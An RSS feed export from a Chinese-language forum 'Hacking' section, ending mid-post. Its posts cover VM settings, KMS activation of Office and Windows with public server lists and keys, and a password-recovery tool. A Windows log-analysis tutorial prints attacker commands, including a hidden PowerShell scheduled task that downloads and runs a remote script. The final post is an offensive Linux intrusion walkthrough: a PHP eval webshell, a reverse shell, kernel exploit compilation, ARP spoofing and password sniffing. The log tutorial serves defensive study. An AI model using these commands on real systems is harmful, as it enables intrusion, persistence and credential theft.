<?xml version="1.0" encoding="UTF-8"?>        <rss version="2.0"
             xmlns:atom="http://www.w3.org/2005/Atom"
             xmlns:dc="http://purl.org/dc/elements/1.1/"
             xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
             xmlns:admin="http://webns.net/mvcb/"
             xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
             xmlns:content="http://purl.org/rss/1.0/modules/content/">
        <channel>
            <title>
									Hacking - ITProSec Resources Forum				            </title>
            <link>https://itprosec.com/community/hacking/</link>
            <description>ITProSec Resources Discussion Board</description>
            <language>en-US</language>
            <lastBuildDate>Wed, 03 Jun 2026 22:58:34 +0000</lastBuildDate>
            <generator>wpForo</generator>
            <ttl>60</ttl>
							                    <item>
                        <title>吾爱破解专用虚拟机系统不能安装VMwaretools问题！</title>
                        <link>https://itprosec.com/community/hacking/%e5%90%be%e7%88%b1%e7%a0%b4%e8%a7%a3%e4%b8%93%e7%94%a8%e8%99%9a%e6%8b%9f%e6%9c%ba%e7%b3%bb%e7%bb%9f%e4%b8%8d%e8%83%bd%e5%ae%89%e8%a3%85vmwaretools%e9%97%ae%e9%a2%98%ef%bc%81/</link>
                        <pubDate>Wed, 21 Apr 2021 00:49:38 +0000</pubDate>
                        <description><![CDATA[先把论坛下载的虚拟机系统解压到自己要保存的盘符！ 然后 找到里面的Windows XP By 52PoJie.vmx 这个文件 用记事本打开。
monitor_control.restrict_backdoor = &quot;TRUE&quot;  monitor_control.disable_directexec = &quot;TRUE&quot;isolation.tools.hgfs.disable =...]]></description>
                        <content:encoded><![CDATA[<p><span>先把论坛下载的虚拟机系统解压到自己要保存的盘符！ 然后 找到里面的</span><span>Windows XP By 52PoJie.vmx</span><span> 这个文件 用记事本打开。</span></p>
<p><span>monitor_control.restrict_backdoor = "TRUE"  <br />monitor_control.disable_directexec = "TRUE"<br />isolation.tools.hgfs.disable = "TRUE"<br />isolation.tools.getVersion.disable = "TRUE" <br /><br />把这4项目的    "TRUE" 更改成"FALSE"   然后重启虚拟机 就可以安装了，    记得安装完后改回去。想必这个是防止软件检测虚拟机的，有很多软件是不允许在虚拟机里运行的！！  <br />PS: 论坛虚拟机是自带Vmwaretools 的不要到处去找了。就在虚拟机安装的目录下有个C:\Program Files (x86)\VMware\VMware Workstation\windows.iso  自己定制硬件定制一个光驱加载下这个ISO就可以啦！！</span></p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e5%90%be%e7%88%b1%e7%a0%b4%e8%a7%a3%e4%b8%93%e7%94%a8%e8%99%9a%e6%8b%9f%e6%9c%ba%e7%b3%bb%e7%bb%9f%e4%b8%8d%e8%83%bd%e5%ae%89%e8%a3%85vmwaretools%e9%97%ae%e9%a2%98%ef%bc%81/</guid>
                    </item>
				                    <item>
                        <title>通过一个攻击案例来进行windows日志分析,在Windows日志里发现入侵痕迹</title>
                        <link>https://itprosec.com/community/hacking/%e9%80%9a%e8%bf%87%e4%b8%80%e4%b8%aa%e6%94%bb%e5%87%bb%e6%a1%88%e4%be%8b%e6%9d%a5%e8%bf%9b%e8%a1%8cwindows%e6%97%a5%e5%bf%97%e5%88%86%e6%9e%90%e5%9c%a8windows%e6%97%a5%e5%bf%97%e9%87%8c%e5%8f%91/</link>
                        <pubDate>Tue, 16 Feb 2021 15:15:19 +0000</pubDate>
                        <description><![CDATA[有小伙伴问：Windows系统日志分析大多都只是对恶意登录事件进行分析的案例，可以通过系统日志找到其他入侵痕迹吗？
答案肯定是可以的，当攻击者获取webshell后，会通过各种方式来执行系统命令。所有的web攻击行为会存留在web访问日志里，而执行操作系统命令的行为也会存在在系统日志。
不同的攻击场景会留下不一样的系统日志痕迹，不同的Event ID代表了不同的意义，需要重...]]></description>
                        <content:encoded><![CDATA[<div class="rno-markdown J-articleContent">
<p>有小伙伴问：Windows系统日志分析大多都只是对恶意登录事件进行分析的案例，可以通过系统日志找到其他入侵痕迹吗？</p>
<p>答案肯定是可以的，当攻击者获取webshell后，会通过各种方式来执行系统命令。所有的web攻击行为会存留在web访问日志里，而执行操作系统命令的行为也会存在在系统日志。</p>
<p>不同的攻击场景会留下不一样的系统日志痕迹，不同的Event ID代表了不同的意义，需要重点关注一些事件ID，来分析攻击者在系统中留下的攻击痕迹。</p>
<p>我们通过一个攻击案例来进行windows日志分析，从日志里识别出攻击场景，发现恶意程序执行痕迹，甚至还原攻击者的行为轨迹。</p>
<figure><hr /></figure>
<p><strong>1、信息收集</strong></p>
<p>攻击者在获取webshell权限后，会尝试查询当前用户权限，收集系统版本和补丁信息，用来辅助权限提升。</p>
<pre class="prism-token token  language-javascript">whoami
systeminfo</pre>
<p><strong>Windows日志分析：</strong></p>
<p>在本地安全策略中，需开启审核进程跟踪，可以跟踪进程创建/终止。关键进程跟踪事件和说明，如：</p>
<pre class="prism-token token  language-javascript"><span class="token number">4688</span> 创建新进程
<span class="token number">4689</span> 进程终止
</pre>
<figure>
<div class="image-block"><span><img class="fade-appear-active" src="https://ask.qcloudimg.com/http-save/yehe-5767423/yjofaj1e9p.png?imageView2/2/w/1620" /></span></div>
</figure>
<p>我们通过LogParser做一个简单的筛选，得到Event ID 4688，也就是创建新进程的列表，可以发现用户Bypass，先后调用cmd执行whami和systeminfo。Conhost.exe进程主要是为命令行程序（cmd.exe）提供图形子系统等功能支持。</p>
<pre class="prism-token token  language-javascript">LogParser<span class="token punctuation">.</span>exe  <span class="token operator">-</span>i<span class="token punctuation">:</span>EVT <span class="token string">"SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,'|')  as UserName,EXTRACT_TOKEN(Strings,5,'|')  as ProcessName FROM c:\11.evtx where EventID=4688"</span>
</pre>
<figure>
<div class="image-block"><span><img class="fade-appear-active" src="https://ask.qcloudimg.com/http-save/yehe-5767423/qrhb4copiy.png?imageView2/2/w/1620" /></span></div>
</figure>
<p><strong>2、权限提升</strong></p>
<p>通过执行exp来提升权限，获取操作系统system权限，增加管理用户。</p>
<pre class="prism-token token  language-javascript">ms16<span class="token number">-032</span><span class="token punctuation">.</span>exe <span class="token string">"whoami"</span>
ms16<span class="token number">-032</span><span class="token punctuation">.</span>exe <span class="token string">"net user test1 abc123! /add"</span>
ms16<span class="token number">-032</span><span class="token punctuation">.</span>exe <span class="token string">"net localgroup Administrators test1 /add"</span></pre>
<p><strong>Windows日志分析：</strong></p>
<p>在本地安全策略中，需开启审核账户管理，关键账户管理事件和说明。如：</p>
<pre class="prism-token token  language-javascript"><span class="token number">4720</span>  创建用户
<span class="token number">4732</span>  已将成员添加到启用安全性的本地组
</pre>
<figure>
<div class="image-block"><span><img class="" src="https://ask.qcloudimg.com/http-save/yehe-5767423/cbv9i89uee.png?imageView2/2/w/1620" /></span></div>
</figure>
<p>这里会涉及进程创建，主要关注账户创建和管理用户组变更。从Event ID 4720 ，系统新建了一个test用户，从Event ID 4732的两条记录变化，得到一个关键信息，本地用户test从user组提升到Administrators。</p>
<p><strong>3、管理账号登录</strong></p>
<p>在创建管理账户后，尝试远程登录到目标主机，获取敏感信息。</p>
<pre class="prism-token token  language-javascript">mstsc <span class="token operator">/</span>v <span class="token number">10.1</span><span class="token punctuation">.</span><span class="token number">1.188</span></pre>
<p><strong>Windows日志分析：</strong></p>
<p>在本地安全策略中，需开启审核登录事件，关键登录事件和说明，如：</p>
<pre class="prism-token token  language-javascript"><span class="token number">4624</span> 登录成功
<span class="token number">4625</span> 登录失败
</pre>
<figure>
<div class="image-block"><span><img class="" src="https://ask.qcloudimg.com/http-save/yehe-5767423/8d8hzbx3np.png?imageView2/2/w/1620" /></span></div>
</figure>
<pre class="prism-token token  language-javascript">LogParser<span class="token punctuation">.</span>exe <span class="token operator">-</span>i<span class="token punctuation">:</span>EVT <span class="token string">"SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,'|') as EventType,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings,18,'|') as Loginip FROM C:\3333.evtx where EventID=4624"</span></pre>
<p>使用LogParser做一下分析，得到系统登录时间，登录类型10 也就是远程登录，登录用户 test，登录IP：10.1.1.1。</p>
<figure>
<div class="image-block"><span><img class="" src="https://ask.qcloudimg.com/http-save/yehe-5767423/6clv5bc6dq.png?imageView2/2/w/1620" /></span></div>
</figure>
<p><strong>4、权限维持</strong></p>
<p>通过创建计划任务执行脚本后门，以便下次直接进入，使用以下命令可以一键实现：</p>
<pre class="prism-token token  language-javascript">schtasks <span class="token operator">/</span>create <span class="token operator">/</span>sc minute <span class="token operator">/</span>mo <span class="token number">1</span> <span class="token operator">/</span>tn <span class="token string">"Security Script"</span> <span class="token operator">/</span>tr <span class="token string">"powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.1.1.1:8888/logo.txt\"\"\"))\""</span></pre>
<p><strong>Windows日志分析：</strong></p>
<p>在本地安全策略中，需开启审核对象访问，关键对象访问事件，如：</p>
<pre class="prism-token token  language-javascript"><span class="token number">4698</span>  创建计划任务
<span class="token number">4699</span>  删除计划任务
</pre>
<figure>
<div class="image-block"><span><img class="" src="https://ask.qcloudimg.com/http-save/yehe-5767423/kasrcljjax.png?imageView2/2/w/1620" /></span></div>
</figure>
<p>这里涉及进程创建和对象访问事件，包括schtasks.exe进程的创建和Event ID 4698发现新建的计划任务。成功找到计划任务后门位置：</p>
<figure>
<div class="image-block"><span><img class="" src="https://ask.qcloudimg.com/http-save/yehe-5767423/hwt0get8y6.png?imageView2/2/w/1620" /></span></div>
</figure>
</div>
<div class="col-2-article-source">
<p>本文分享自微信公众号 -<span> </span>Bypass（Bypass--），作者：Bypass</p>
</div>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e9%80%9a%e8%bf%87%e4%b8%80%e4%b8%aa%e6%94%bb%e5%87%bb%e6%a1%88%e4%be%8b%e6%9d%a5%e8%bf%9b%e8%a1%8cwindows%e6%97%a5%e5%bf%97%e5%88%86%e6%9e%90%e5%9c%a8windows%e6%97%a5%e5%bf%97%e9%87%8c%e5%8f%91/</guid>
                    </item>
				                    <item>
                        <title>查看Windows凭据储存的密码</title>
                        <link>https://itprosec.com/community/hacking/%e6%9f%a5%e7%9c%8bwindows%e5%87%ad%e6%8d%ae%e5%82%a8%e5%ad%98%e7%9a%84%e5%af%86%e7%a0%81-2/</link>
                        <pubDate>Sun, 10 May 2020 11:56:55 +0000</pubDate>
                        <description><![CDATA[web凭据 我们输入当前用户及密码就能查看了。可是 Windows凭据 无法查看密码。

所以我们需要另外的软件来查看：Network Password Recovery
访问上面的网址，往下拉就能看到下载地址。注意区分64位和32位。
该软件不用安装，打开后获取管理员权限即可运行。

备用下载地址：
链接:提取码: bcg1]]></description>
                        <content:encoded><![CDATA[<p>web凭据 我们输入当前用户及密码就能查看了。可是 Windows凭据 无法查看密码。</p>
<p><a class="highslide-image" href="https://lighti.me/wp-content/uploads/2019/10/windows%E5%87%AD%E6%8D%AE_20191016.png"><img class="alignnone wp-image-5071 size-full" src="https://lighti.me/wp-content/uploads/2019/10/windows%E5%87%AD%E6%8D%AE_20191016.png" alt="Windows凭据" width="978" height="483" data-tag="bdshare" /></a></p>
<p>所以我们需要另外的软件来查看：<a href="https://www.nirsoft.net/utils/network_password_recovery.html" target="_blank" rel="noopener">Network Password Recovery</a></p>
<p>访问上面的网址，往下拉就能看到下载地址。注意区分64位和32位。</p>
<p>该软件不用安装，打开后获取管理员权限即可运行。</p>
<p><a class="highslide-image" href="https://lighti.me/wp-content/uploads/2019/10/netpassre_20191016.png"><img class="alignnone wp-image-5072 size-full" src="https://lighti.me/wp-content/uploads/2019/10/netpassre_20191016.png" alt="networkpasswordrecovery" width="1283" height="483" data-tag="bdshare" /></a></p>
<p>备用下载地址：</p>
<p><a href="http://pikachu.im/other/netpass-x64.zip" target="_blank" rel="noopener">http://pikachu.im/other/netpass-x64.zip</a></p>
<p>链接:<span> </span><a href="https://pan.baidu.com/s/1lBUW-nT9mC1L5M5Nc7fp7g" target="_blank" rel="noopener">https://pan.baidu.com/s/1lBUW-nT9mC1L5M5Nc7fp7g</a><span> </span>提取码: bcg1</p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e6%9f%a5%e7%9c%8bwindows%e5%87%ad%e6%8d%ae%e5%82%a8%e5%ad%98%e7%9a%84%e5%af%86%e7%a0%81-2/</guid>
                    </item>
				                    <item>
                        <title>Office Tool Plus 安装 Office 2019 教程</title>
                        <link>https://itprosec.com/community/hacking/office-tool-plus-%e5%ae%89%e8%a3%85-office-2019-%e6%95%99%e7%a8%8b/</link>
                        <pubDate>Mon, 20 Apr 2020 19:04:49 +0000</pubDate>
                        <description><![CDATA[该教程源自官方教程以及本人亲自测试稳定可用，故整理分享。本教程可能不是安装 Office 2019 唯一的方法，却是应用最广泛，错误率最低的安装方法。如果您在安装过程中遇到了任何错误，请自行检查配置是否出错。如果是因为系统问题：比如是某风的 GHO 或者系统之家的 GHO 系统，请使用 ISO 镜像重新安装最新版的原版 Windows。对于因为使用 360 安全卫士以及电脑管家...]]></description>
                        <content:encoded><![CDATA[<p><span>该教程源自官方教程以及本人亲自测试稳定可用，故整理分享。</span><br /><span>本教程可能不是安装 Office 2019 唯一的方法，却是应用最广泛，错误率最低的安装方法。如果您在安装过程中遇到了任何错误，请自行检查配置是否出错。如果是因为系统问题：比如是某风的 GHO 或者系统之家的 GHO 系统，请使用 ISO 镜像重新安装最新版的原版 Windows。对于因为使用 360 安全卫士以及电脑管家、金山毒霸等而造成的安装程序无法正常进行亦或者是激活出错的，请使用者自行解决问题并承担所有可能的后果。</span><br /><strong>有条件请支持正版！</strong></p>
<p align="center"><span class="f18">一、准备工具</span></p>
<p><span>去官网 </span>https://otp.landian.vip/zh-cn/<span>下载OTP(Office Tool Plus)工具。</span><br /><span>打开软件，会显示如下的界面。</span></p>
<div class="image-big"><img src="https://i.loli.net/2020/04/20/pElZyHzLbGVe7w6.png" /></div>
<p><span> </span><br /><span>如果电脑上已经安装了其他版本的Office和相关插件等工具，需要</span><strong>先卸载</strong><span>，卸载完毕后需要重启电脑，卸载可以在OTP工具中进行。</span></p>
<p align="center">二、在线安装</p>
<p> </p>
<div class="image-big"><img src="https://i.loli.net/2020/04/20/DubgLxS548UEAZP.jpg" /></div>
<p><span> </span><br /><span>Office 套件务必选择 ProPlus2019Volume，产品可以根据个人情况来决定是否选择安装 Visio 或者 Project，如需安装，请按图所示选择对应的产品 ID，否则，该选项请留空。</span><br /><span>通道如图选择 PerpetualVL2019。体系架构可以按照需求选择，如无需要，默认 x86 即可。应用程序按需选择，语言按需选择。如果不会设置的请如图所示进行设置以安装简体中文版的 Office 2019，包含 Word、PowerPoint、Excel。</span></p>
<p align="center">三、激活</p>
<p><strong>注意</strong><span>：此激活方式为 180 天的 7 天周期循环激活，在联网的情况下，您无需担心激活过期，也不必手动续期。</span><br /><span>选择 </span><strong>Office 2019 Volume</strong><span> 证书，并点击安装许可证按钮。，密钥管理不用填，在 KMS 管理内输入 KMS 地址，并点击设定服务器按钮，设定完成后，请返回此页此页面</span><br /><img src="https://i.loli.net/2020/04/20/Epv3mqM6ceC2FVX.jpg" /><span> </span><br /><img src="https://i.loli.net/2020/04/20/lzJk3R28PaW9Hsv.jpg" /><span> </span><br /><span>然后点击激活按钮，Office 2019 将会尝试激活，激活成功后，你应该看到如下的结果：</span></p>
<div class="image-big"><img src="https://i.loli.net/2020/04/20/NtUw3ZFdSja9Ocy.jpg" /></div>
<p><span> </span></p>
<p align="center"><span class="f18">四、常见问题</span></p>
<p><span>一般来说，按照步骤操作，一次性就可以成功。如果仍然没有安装成功，检查是否卸载原有WPS,OFFICE等。</span><br /><span>1.如果激活提示出错，或显示错误代码。要使用的工具箱中的“修复OFFICE无法正常激活”。另外在“安装许可证”和“安装密钥”旁的三角箭头，选择“删除许可证”和“卸载密钥”。然后按照上面步骤，重新三步走安装。</span><br /><span>2.在工具箱找相关文档查询。</span><br /><span>3.在OTP官网上学习官方提供的安装技术。</span><br /><span>附：KMS服务器地址以及2个密钥</span><br /><span>kms.loli.beer</span><br /><span>kms.loli.cab</span><br /><span>kms.90zm.xyz</span><br /><span>kms.cangshui.net</span><br /><span>kms.03k.org</span><br /><span>kms.myftp.org</span><br /><span>zh.us.to</span><br /><span>kms.chinancce.com</span><br /><span>kms.digiboy.ir</span><br /><span>kms.luody.info</span><br /><span>kms.mrxn.net</span><br /><span>kms8.MSGuides.com</span><br /><span>xykz.f3322.org</span><br /><span>kms.bige0.com</span><br /><span>kms.shuax.com</span><br /><span>kms9.MSGuides.com</span><br /><span>kms.lotro.cc</span><br />www.ddddg.cn<br /><span>cy2617.jios.org</span><br /><span>enter.picp.net</span><br /><span>NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP</span><br /><span>9BGNQ-K37YR-RQHF2-38RQ3-7VCBB</span></p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/office-tool-plus-%e5%ae%89%e8%a3%85-office-2019-%e6%95%99%e7%a8%8b/</guid>
                    </item>
				                    <item>
                        <title>搭建kms服务器（docker）</title>
                        <link>https://itprosec.com/community/hacking/%e6%90%ad%e5%bb%bakms%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%88docker%ef%bc%89/</link>
                        <pubDate>Sat, 18 Apr 2020 16:50:13 +0000</pubDate>
                        <description><![CDATA[kms服务器能让我们激活VOL版的Windows及office。
kms有效期是180天。到期如果kms服务器仍然可用，会自动续期。
不需要再去找乱七八糟、可能含有病毒的激活工具。
用docker搭建kms
docker pull luodaoyi/kms-serverdocker run -d -p 1688:1688 --restart=always --name=...]]></description>
                        <content:encoded><![CDATA[<p>kms服务器能让我们激活VOL版的Windows及office。</p>
<p>kms有效期是180天。到期如果kms服务器仍然可用，会自动续期。</p>
<p>不需要再去找乱七八糟、可能含有病毒的激活工具。</p>
<h2>用docker搭建kms</h2>
<p><span><code>docker pull luodaoyi/kms-server</code></span><br /><span><code>docker run -d -p 1688:1688 --restart=always --name="kms" luodaoyi/kms-server</code></span></p>
<p>记得防火墙开放1688的端口</p>
<h2>使用kms</h2>
<h3>激活Windows</h3>
<p><strong>配置使用 KMS 服务器</strong></p>
<p><span><code>slmgr /skms 你的服务器ip:端口</code></span></p>
<p>上面的命令如果是默认的1688端口，则不需要特意指定端口</p>
<p><strong>启用激活</strong></p>
<p><code><span>slmgr /ato</span></code></p>
<p><strong>查看激活状态</strong></p>
<p><code><span>slmgr /xpr</span></code></p>
<h3>激活office</h3>
<p><strong>定位office版本及目录</strong></p>
<p><code><span>if exist "C:\Program Files (x86)\Microsoft Office\Office14\ospp.vbs" (cd "C:\Program Files (x86)\Microsoft Office\Office14") else (cd "c:\Program Files\Microsoft Office\Office14")</span></code><br /><code><span>if exist "C:\Program Files (x86)\Microsoft Office\Office15\ospp.vbs" (cd "C:\Program Files (x86)\Microsoft Office\Office15") else (cd "c:\Program Files\Microsoft Office\Office15")</span></code><br /><code><span>if exist "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" (cd "C:\Program Files (x86)\Microsoft Office\Office16") else (cd "c:\Program Files\Microsoft Office\Office16")</span></code></p>
<p>office16是office2016，office15就是2013，office14就是2010</p>
<p><strong>配置使用 KMS 服务器</strong></p>
<p><code><span>cscript ospp.vbs /sethst:你的服务器IP或域名</span></code><br /><code><span>cscript ospp.vbs /setprt:1688</span></code></p>
<p>如使用默认端口，第二条命令不需要</p>
<p><strong>启用激活</strong></p>
<p><code><span>cscript ospp.vbs /act</span></code></p>
<p><strong>查看激活状态</strong></p>
<p><code><span>cscript ospp.vbs /dstatus</span></code></p>
<hr />
<p>将上面的命令放到批处理文件能实现快速激活</p>
<hr />
<p>参考：<a href="https://www.iszy.cc/2019/01/11/setup-kms/" target="_blank" rel="noopener">Linux 自建 KMS 服务器</a></p>
<p>相关：<a href="https://lighti.me/5027.html" target="_blank" rel="noopener">Docker使用心得</a></p>
<p>下载Windows及office：<a href="https://msdn.itellyou.cn/" target="_blank" rel="noopener">MSDN I tell you</a></p>
<p>GVLK相关：<br />Office 2019 &amp; Office 2016：<a href="https://docs.microsoft.com/en-us/DeployOffice/vlactivation/gvlks" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/DeployOffice/vlactivation/gvlks</a><br />Office 2013：<a href="https://technet.microsoft.com/zh-cn/library/dn385360.aspx" target="_blank" rel="noopener">https://technet.microsoft.com/zh-cn/library/dn385360.aspx</a><br />Office 2010：<a href="https://technet.microsoft.com/zh-cn/library/ee624355(v=office.14).aspx" target="_blank" rel="noopener">https://technet.microsoft.com/zh-cn/library/ee624355(v=office.14).aspx</a><br />Windows：<a href="https://docs.microsoft.com/zh-cn/windows-server/get-started/kmsclientkeys" target="_blank" rel="noopener">https://docs.microsoft.com/zh-cn/windows-server/get-started/kmsclientkeys</a></p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e6%90%ad%e5%bb%bakms%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%88docker%ef%bc%89/</guid>
                    </item>
				                    <item>
                        <title>学习黑客十大经典书籍榜单</title>
                        <link>https://itprosec.com/community/hacking/%e5%ad%a6%e4%b9%a0%e9%bb%91%e5%ae%a2%e5%8d%81%e5%a4%a7%e7%bb%8f%e5%85%b8%e4%b9%a6%e7%b1%8d%e6%a6%9c%e5%8d%95/</link>
                        <pubDate>Tue, 07 Apr 2020 01:54:22 +0000</pubDate>
                        <description><![CDATA[《安全漏洞追踪》：书很老，但这本书影响蛮大的，看了这书，才真正把安全意识带入到实际开发中。
《灰帽黑客》：去年出了新版，老版本时，书里面涉及很多，渗透到漏洞分析。
《网络黑白》：真正值得看的就这一本了，伙伴们：）最近卖得很火，都快绝版了，黑客入门到精通。
《web前端黑客》：余弦的书，专注前端方面的书，必须赞一个，我个人比较喜欢看专注某一个方面的书。
《白帽子讲Web安...]]></description>
                        <content:encoded><![CDATA[<p>《安全漏洞追踪》：书很老，但这本书影响蛮大的，看了这书，才真正把安全意识带入到实际开发中。</p>
<p>《灰帽黑客》：去年出了新版，老版本时，书里面涉及很多，渗透到漏洞分析。</p>
<p>《网络黑白》：真正值得看的就这一本了，伙伴们：）最近卖得很火，都快绝版了，黑客入门到精通。</p>
<p>《web前端黑客》：余弦的书，专注前端方面的书，必须赞一个，我个人比较喜欢看专注某一个方面的书。</p>
<p>《白帽子讲Web安全》：刺的书，web安全方面涉及很多，不过总体有点偏向企业级的。</p>
<p>《黑客攻防技术宝典:Web实战篇》：里面罗列的很多让我反而更觉得这书给搞安全开发的人看更合适：</p>
<p>《sql注入攻击与防御》：一本专注讲sql注入的，现在看来都还是很不错，有很多技巧。</p>
<p>《反欺骗的艺术》：社会工程鼻祖，凯文米特尼克的书，毫无疑问上榜单。</p>
<p>《线上幽灵》 凯文的自传</p>
<p>《Metasploit渗透测试指南》 黑客小白进阶之后学习渗透推荐书，还是有帮助的。</p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e5%ad%a6%e4%b9%a0%e9%bb%91%e5%ae%a2%e5%8d%81%e5%a4%a7%e7%bb%8f%e5%85%b8%e4%b9%a6%e7%b1%8d%e6%a6%9c%e5%8d%95/</guid>
                    </item>
				                    <item>
                        <title>黑客如何入侵Linux服务器？掌握这几个命令够了</title>
                        <link>https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%a6%82%e4%bd%95%e5%85%a5%e4%be%b5linux%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%9f%e6%8e%8c%e6%8f%a1%e8%bf%99%e5%87%a0%e4%b8%aa%e5%91%bd%e4%bb%a4%e5%a4%9f%e4%ba%86/</link>
                        <pubDate>Mon, 06 Apr 2020 02:28:55 +0000</pubDate>
                        <description><![CDATA[写个php一句话后门上去：$ echo -e &quot;&lt;?php @eval($_POST)?&gt;&quot; &gt;rankuplog_time.php$ cat rankuplog_time.php1、linux的想着先跨站。shell浏览目标站不行...]]></description>
                        <content:encoded><![CDATA[<p><span>写个php一句话后门上去：</span><br /><br /><span>$ echo -e "&lt;?php @eval($_POST)?&gt;" &gt;rankuplog_time.php</span><br /><br /><span>$ cat rankuplog_time.php</span><br /><br /><span>1、linux的想着先跨站。</span><br /><span>shell浏览目标站不行，命令行下输入ls -la /www.users/</span><br /><br /><span>2、溢出提权</span><br /><span># python –c ‘impotr pty;pty.spawn(“/bin/sh”);</span><br /><br /><br /><br /><span>来得到交互的Shell,一般的系统都默认安装python</span><br /><br /><br /><br /><span>输入id</span><br /><span>bash-3.2$ id</span><br /><span>uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)</span><br /><span>bash-3.2$</span><br /><span>这里uid=529(zeicom)还不是root权限，</span><br /><span>输入uname –r</span><br /><span>返回：2.6.18-164.11.1.el5PAE</span><br /><br /><br /><span>Linux提权大致可分为，第三方软件漏洞、本地信任特性、内核溢出</span><br /><br /><span>找对应的exp, 这里地址整理很齐全可以这里下</span><br /><br /><br /><br /><a class="gj_safe_a" href="http://tools.90sec.org/" target="_blank" rel="noopener">http://tools.90sec.org/</a><br /><br /><a class="gj_safe_a" href="http://sebug.net/paper/linux_exp/" target="_blank" rel="noopener">http://sebug.net/paper/linux_exp/</a><br /><br /><a class="gj_safe_a" href="http://x73.cc/bitch/exp/" target="_blank" rel="noopener">http://x73.cc/bitch/exp/</a><br /><br /><a class="gj_safe_a" href="https://www.exploit-db.com/search/" target="_blank" rel="noopener">http://www.exploit-db.com/search/</a><br /><br /><br /><br /><span>命令输入pwd,这个命令是显示当前目录，</span><br /><br /><span>先看能不能编译  gcc -help</span><br /><br /><br /><br /><span>当前目录就是shell的目录，我在shell上传2.c</span><br /><br /><span>反弹shell  到外网自己机器的12345端口  </span><br /><br /><span>上外网服务器 本地监听 nc -lvvp 12345</span><br /><br /><span>一般都能得到一个apache交互的shell 有时候又不行</span><br /><br /><br /><br /><span>这时候  </span><br /><br /><br /><br /><span># python -c 'impotr pty;pty.spawn("/bin/sh");'</span><br /><span>cd /tmp        进入tmp目录</span><br /><span>mkdir Papers   创建一个Papers的目录 Papers不显眼</span><br /><span>cd Papers      进入 Papers目录</span><br /><span>pwd            查看当前目录   </span><br /><span>然后命令输入</span><br /><span>wget 下载exp</span><br /><span>gcc –o 2 2.c  //把2.c编译成可执行文件 g++ keio.cc -o keio</span><br /><span>chmod +x 2     //给2有执行权限</span><br /><span>./2            //执行2,  溢出</span><br /><span>gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet</span><br /><br /><br /><span>确定arpsniffer.c需要先装pcap和 libnet。</span><br /><br /><br /><br /><span>rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm</span><br /><span>wget </span><a class="gj_safe_a" href="https://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&amp;big_mirror=0" target="_blank" rel="noopener">http://downloads.sourceforge.net ... 00&amp;big_mirror=0</a><br /><span>tar zxvf libpcap-0.8.1.tar.gz</span><br /><span>cd libpcap-0.8.1</span><br /><span>./configure</span><br /><span>make</span><br /><span>make install</span><br /><br /><br /><span>重新编译arpsniffer.c</span><br /><br /><br /><br /><span>gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet</span><br /><br /><br /><span>这次没报错，编译成功。</span><br /><br /><br /><br /><span>./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254</span><br /><br /><br /><span>下面开始欺骗，由于是服务器端，因此我们欺骗网关：（网络环境如下，邮件服务器ip：192.168.0.11 网关：192.168.0.1 本机：192.168.0.77）</span><br /><br /><br /><br /><span>./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110</span><br /><br /><br /><span>在另一个登录里面用tcpdump监听下</span><br /><br /><br /><br /><span>tcpdump -i eth0 host 192.168.0.11</span><br /><br /><br /><span>发现有数据，把监听的数据存在文件里面：</span><br /><br /><br /><br /><span>tcpdump -i eth0 host 172.16.0.12 -w pop.txt</span><br /><br /><br /><span>10分钟后停止，在SecureCRT下用sz命令下载pop.txt到本地，然后用Ethereal分析。</span><br /><br /><br /><br /><span>下面我们就可以用linsniffer监听我们想要的用户名和密码了。</span><br /><br /><br /><br /><span>先修改linsniffer.c：根据自己的需求监听相应的应用密码。我的如下：</span><br /><br /><br /><br /><span>if(ntohs(tcp-&gt;dest)==21)  p=1; /* ftp */</span><br /><span>if(ntohs(tcp-&gt;dest)==22)  p=1; /* ssh for comparison added for example only comment out if desired*/</span><br /><span>if(ntohs(tcp-&gt;dest)==23)  p=1; /* telnet */</span><br /><span>if(ntohs(tcp-&gt;dest)==80) p=1;  /* http */</span><br /><span>if(ntohs(tcp-&gt;dest)==110) p=1; /* pop3 */</span><br /><span>if(ntohs(tcp-&gt;dest)==513) p=1; /* rlogin */</span><br /><span>if(ntohs(tcp-&gt;dest)==106) p=1; /* poppasswd */</span><br /><span># gcc -o linsniffer linsniffer.c</span><br /><span>In file included from 